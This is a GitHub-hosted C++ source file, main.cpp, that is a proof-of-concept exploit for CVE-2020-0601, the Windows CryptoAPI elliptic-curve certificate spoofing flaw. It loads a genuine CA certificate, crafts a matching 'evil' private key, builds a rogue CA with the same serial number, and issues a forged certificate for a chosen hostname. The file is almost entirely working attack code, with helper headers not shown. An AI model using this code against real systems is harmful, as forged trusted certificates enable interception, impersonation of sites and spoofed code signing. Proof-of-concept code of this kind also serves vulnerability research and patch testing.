-
Notifications
You must be signed in to change notification settings - Fork 2
/
main.cpp
91 lines (78 loc) · 3.05 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#include <iostream>
#include <sstream>
#include <fstream>
#include "cve-2020-0601_poc.h"
#include "openssl-helper.h"
bool genCve20200601Cert(const char *commonName,
const char *caPubKey, size_t caPubKeyLen,
const char *caSerial, size_t caSerialLen)
{
bool ret = false;
// craft evil private key which generates the desired public key
char evilPrivKeyPKCS8[16384];
size_t evilPrivKeyPKCS8Len;
ret = craftEvilPrivKey(caPubKey, caPubKeyLen,
evilPrivKeyPKCS8, sizeof(evilPrivKeyPKCS8), &evilPrivKeyPKCS8Len,
true, "test-cve_evil-privkey-pk8.key");
if (!ret) {
return ret;
}
// convert this private key to PEM format
char evilPrivKeyPem[16384];
size_t evilPrivKeyPemLen;
ret = pkcs8PrivKeyToPem(evilPrivKeyPKCS8, evilPrivKeyPKCS8Len,
evilPrivKeyPem, sizeof(evilPrivKeyPem), &evilPrivKeyPemLen,
true, "test-cve_evil-privkey.key");
if (!ret) {
return ret;
}
// create our rogue CA with the same serial number as the original one
// sign it with evil private key
unsigned char evilCaCert[16384];
size_t evilCaCertLen;
ret = genSignedCaCertWithSerial(caSerial,
(const char *)evilPrivKeyPem, evilPrivKeyPemLen,
evilCaCert, sizeof(evilCaCert), &evilCaCertLen,
true, "test-cve_evil-ca.crt");
if (!ret) {
return ret;
}
// here is why we are here: generate a certificate for the provided common name
// which is signed by the evil CA
unsigned char hostCert[8192];
size_t hostCertLen;
unsigned char hostKey[8192];
size_t hostKeyLen;
ret = genSignedCertForCN(commonName,
(const char *)evilCaCert, evilCaCertLen,
(const char *)evilPrivKeyPem, evilPrivKeyPemLen,
hostKey, sizeof(hostKey), &hostKeyLen,
hostCert, sizeof(hostCert), &hostCertLen,
true, "test-cve_host-cert.crt", "test-cve_host-privkey.key");
return ret;
}
int main(int argc, char **argv)
{
bool ret = false;
std::string caCertPem;
std::ostringstream buf;
std::ifstream caCertF(argv[1]);
buf << caCertF.rdbuf();
caCertPem = buf.str();
// get raw public key bytes from the CA certificate
// our aim is be able to craft a key that will produce them
unsigned char caPubKey[8192];
size_t caPubKeyLen;
ret = getCertPublicKey(caCertPem.c_str(), caCertPem.size(), caPubKey, &caPubKeyLen);
if (!ret) {
return -1;
}
// get CA's serial number
unsigned char caSerial[512];
size_t caSerialLen;
ret = getCertSerial(caCertPem.c_str(), caCertPem.size(), caSerial, sizeof(caSerial), &caSerialLen);
if (!ret) {
return -1;
}
return genCve20200601Cert("example.com", (const char*)caPubKey, caPubKeyLen, (const char*)caSerial, caSerialLen);
}